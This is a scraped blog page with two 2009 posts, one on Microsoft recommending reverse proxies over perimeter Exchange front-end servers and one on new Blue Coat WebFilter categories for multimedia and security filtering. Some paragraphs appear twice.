(Side note: I love the title of their blog "You had me at EHLO" - as a former postmaster, I can really appreciate it.)
Instead the recommendation is to use reverse proxies. Their explanation:
Reverse Proxies are built to be put in the perimeter network or at the edge of the network. They include many security features and flexibility for customers to determine the level of defense-in-depth which is right in any particular environment.
If Microsoft recommended FE servers to be in the perimeter network for 2000/2003, what are the other reasons they've changed their stance for Exchange 2007 and 2010? Here's some of the more detailed rationale:
The E2000/E2003 FE servers were there to authenticate users and proxy traffic to the BE server where the traffic was actually interpreted and responded to. For example, the FE servers in E2000/E2003 don't do any Outlook Web Access (OWA) rendering. That all takes place on the BE servers.
The E2007/E2010 CAS role on the other hand contains all middle-tier logic and rendering code for processes like OWA, Exchange ActiveSync (EAS), Exchange Web Services (EWS), and more.
It looks like Microsoft is coming around to what we've known here all along, which is the proxy is still the best solution for securing web traffic coming into and out of the organization.
(Side note: I love the title of their blog "You had me at EHLO" - as a former postmaster, I can really appreciate it.)
Wednesday, October 21, 2009
Keeping an Eye on Multimedia Application Use
Network World reported this week on Blue Coat's new offerings for monitoring Multimedia Application use in the workplace.  IT admins have routinely blocked or allowed video traffic based on corporate requirements and policies.  There was a time you could easily claim video traffic from sites like youtube were recreational in nature and block it.  Lately, though, there’s more and more legitimate business content, such as training videos, on YouTube, which makes it harder for IT admins and HR groups to make a blanket policy decision on what's allowed in the workplace.
Blue Coat Systems in their latest update, is trying to give its customers greater flexibility when it comes to application and bandwidth policies. By upgrading to Blue Coat’s newest version of their URL filtering software, called WebFilter, IT managers will have more granular control over Web-based multimedia applications and greater protection against Web-based threats. Ten new categories are now available in WebFilter, including six network usage-related and four security-related categories.
From Network World:
Just a good reminder to keep our proxy software up to date, so we can take advantage of new features to make developing enterprise policy on the proxy easier.
Blue Coat Systems in their latest update, is trying to give its customers greater flexibility when it comes to application and bandwidth policies. By upgrading to Blue Coat’s newest version of their URL filtering software, called WebFilter, IT managers will have more granular control over Web-based multimedia applications and greater protection against Web-based threats. Ten new categories are now available in WebFilter, including six network usage-related and four security-related categories.
From Network World:
The goal is to give enterprises the tools to see how employees are really using Web-based applications and content, and then apply policies that don’t get in the way of important business activities, says Steve House, Director of Product Marketing at Blue Coat. “We’re getting more granular in our ability to understand Web traffic. More and more traffic is moving to the Web, including business traffic and recreational traffic,” House says. “We have really invested in understanding that and are using that information to make better decisions around how the network is utilized and how secure the environment might really be.”
On the multimedia front, Blue Coat added six new categories to WebFilter: media sharing, art/culture, Internet telephony, network errors, TV/video streams and radio/audio streams. With these new categories, companies can distinguish between the different types of multimedia applications so they don’t adopt inflexible traffic policies that limit productivity.
Another new feature is the ability to differentiate long radio and video streams from short streams that are less than 15 minutes. This lets a business allow shorter audio/video clips during normal business hours but only allow bandwidth consuming TV/video streams after business hours, for instance.
“There’s a very big difference between someone watching a two-minute training video versus someone going to Hulu and watching a TV show or two-hour movie,” House says. “Those things can definitely consume massive amounts of resources and are much more of a productivity drain.”
In addition, Blue Coat WebFilter can now assign URLs to up to four categories. For example, an online news publication could be classified in the news category, while the sports section of that publication could be classified under both the news and sports categories so a company could decide to restrict access to the sports section without blocking access to the entire news site.
On the security front, Blue Coat added four new categories designed to better filter Web-based threats associated with unwanted software, online meetings, translation sites and greeting cards.
“For a long time we’ve had the ability to block malware, but now we separately categorize the sites that are trying to instruct botnet-controlled computers, ones that have been infected,” House says. “If you can look and see [which computers] they’re trying to talk to, you can not only block it but also run a report to see who has been infected and turn that over to the IT group.”
Just a good reminder to keep our proxy software up to date, so we can take advantage of new features to make developing enterprise policy on the proxy easier.
Subscribe to:
Comments (Atom)
 
 
 
 Posts
Posts
 
